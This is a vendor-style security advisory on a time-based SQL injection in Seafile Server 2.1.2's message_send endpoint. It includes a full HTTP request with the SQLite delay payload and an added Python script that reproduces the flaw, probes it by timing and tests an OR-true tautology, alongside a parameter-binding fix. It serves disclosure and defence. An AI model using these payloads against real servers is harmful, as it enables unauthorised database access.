Advisory ID: SYSS-2014-001
Product: Seafile Server Community Edition
Vendor: Seafile Ltd.
Affected Version(s): up to and including 2.1.2 (Linux)
Tested Version(s): 2.1.2 (Linux), 2.1.3 (Linux)
Vulnerability Type: SQL Injection
Risk Level: High
Solution Status: Fixed (version 2.1.3)
Solution Date: 2014-01-08 (fix committed by the developer)
Public Disclosure: Open
CVE Reference: Not assigned
Author of Advisory: Marcel Mangold, SySS GmbH, https://www.syss.de/advisories/
Document date: 2014-01-07
The software suffers from at least one SQL injection vulnerability.
The view that handles requests to message/message_send/?from=user takes a POST parameter named mass_email whose value is embedded into a database query without proper escaping or parameter binding, so an authenticated user can inject arbitrary SQL through it. (Fixed in version 2.1.3.)
Request:
+------------------------------------
POST /message/message_send/?from=user HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/user/2/msgs/
Content-Length: 120
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax2zwfbjo51h8ttilp7r7yujrwxeq
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss
+------------------------------------
With the injected value the response is noticeably delayed, because the database has to generate and hex-encode a 250 MB random blob before it can evaluate the (always false) LIKE condition; if mass_email is set to the plain value victim%40sample.xy, the answer is delivered almost instantly. This differential timing is the proof of concept: the request is otherwise identical, the CSRF token and session cookie are those of an ordinary logged-in user, and no error is returned. Note that RANDOMBLOB(), HEX() and LIKE(X,Y) are SQLite functions, which is the database Seahub uses by default; on a MySQL-backed installation the same injection point would need a MySQL delay primitive such as SLEEP(). The vulnerability could also be verified automatically using sqlmap [3].
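To make the root cause and the timing check concrete, the following added example (written for this advisory, not taken from Seahub's source) reproduces the vulnerable pattern locally against an in-memory SQLite database: a lookup that pastes the request parameter into the SQL text, next to the same lookup with a bound parameter, and a differential timing probe of the kind described above. The table name, the schema, the sample e-mail addresses and all function names are assumptions for illustration; the payload has the same shape as the advisory's mass_email value, with a smaller blob so it finishes in well under a second.

```python
"""Time-based SQL injection reproduced locally against SQLite.

Added example, not Seahub code: `lookup_vulnerable` shows the defect class
(string concatenation of an HTTP parameter into SQL), `lookup_safe` the fix
(parameter binding), and `time_based_check` the advisory's verification
method: the same request with and without a CPU-burning payload.
"""
import sqlite3
import time


def make_db():
    # Assumed stand-in schema for a recipient lookup by e-mail address;
    # the rows are constructed sample data.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE profile_profile (id INTEGER PRIMARY KEY, email TEXT)")
    con.executemany(
        "INSERT INTO profile_profile (email) VALUES (?)",
        [("victim@sample.xy",), ("alice@sample.xy",), ("bob@sample.xy",)],
    )
    return con


def lookup_vulnerable(con, email):
    # Vulnerable pattern: the parameter becomes part of the SQL text, so a
    # single quote in `email` closes the literal and the rest is parsed as SQL.
    sql = "SELECT id FROM profile_profile WHERE email = '%s' ORDER BY id" % email
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, email):
    # Hardened: the value travels as a bound parameter and is never parsed as SQL.
    sql = "SELECT id FROM profile_profile WHERE email = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (email,))]


def heavy_payload(base, blob_bytes):
    # SQLite delay primitive of the same shape as the advisory's payload:
    # RANDOMBLOB/HEX/UPPER cost CPU time proportional to blob_bytes, and the
    # trailing AND 'syss'='syss re-closes the quoted literal.
    return "%s' AND 1=LIKE('SYSS',UPPER(HEX(RANDOMBLOB(%d/2)))) AND 'syss'='syss" % (
        base, blob_bytes)


def timed(fn, *args):
    t0 = time.perf_counter()
    rows = fn(*args)
    return rows, time.perf_counter() - t0


def time_based_check(lookup, con, base, blob_bytes=20_000_000, ratio=5.0):
    """Differential timing probe: run the lookup with the benign value, then with
    the heavy payload appended.  Returns (injectable, baseline_s, delayed_s);
    injectable is True when the payload slows the query by more than `ratio`
    (a floor of 0.1 ms keeps a microsecond baseline from inflating the ratio)."""
    _, baseline = timed(lookup, con, base)
    _, delayed = timed(lookup, con, heavy_payload(base, blob_bytes))
    return delayed > ratio * max(baseline, 1e-4), baseline, delayed


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        hit, base_s, delayed_s = time_based_check(fn, db, "victim@sample.xy")
        print("%-10s injectable=%s baseline=%.6fs delayed=%.6fs" % (name, hit, base_s, delayed_s))
    # Boolean variant: the classic OR-true tautology returns every row only
    # through the vulnerable lookup.
    print("vulnerable OR-true:", lookup_vulnerable(db, "x' OR '1'='1"))
    print("safe OR-true:      ", lookup_safe(db, "x' OR '1'='1"))
```

Run as a script it prints a clear delay for the vulnerable lookup and none for the bound-parameter version; the OR-true lines show the same defect through a boolean rather than a timing oracle. In a Django application such as Seahub the equivalent of `lookup_safe` is to keep the ORM's query methods or, for raw SQL, to pass values in the params argument of `cursor.execute(sql, params)` rather than formatting them into the string.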
Update to version 2.1.3.
2014-01-07 - Vulnerability discovered
2014-01-07 - Vulnerability reported to developer
2014-01-08 - Fix committed to GitHub by developer
2014-01-11 - Information about fix sent to me by email
2014-01-13 - Verified fix
[1] SySS GmbH, SYSS-2014-001 - SQL Injection in Seafile Server 2.1.2 - www.syss.de/advisories/SYSS-2014-001
[2] SySS GmbH, SySS Responsible Disclosure Policy - www.syss.de/responsible_disclosure_policy
[3] sqlmap - sqlmap.org
Security vulnerability found by Marcel Mangold, Responsible Hacker at SySS GmbH.
E-Mail: marcel.mangold@syss.de
Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc
Key ID: AC15E5BE
Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE
The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site [1].
Creative Commons - Attribution (by) - Version 3.0 URL: creativecommons.org/licenses/by/3.0/deed.en
Your direct contact to SySS: +49 (0)7071 - 40 78 56-0 or anfrage@syss.de | FOR URGENT CASES OUTSIDE BUSINESS HOURS: +49 (0)7071 - 40 78 56-99
Framework agreement customers please use the on-call number provided to them.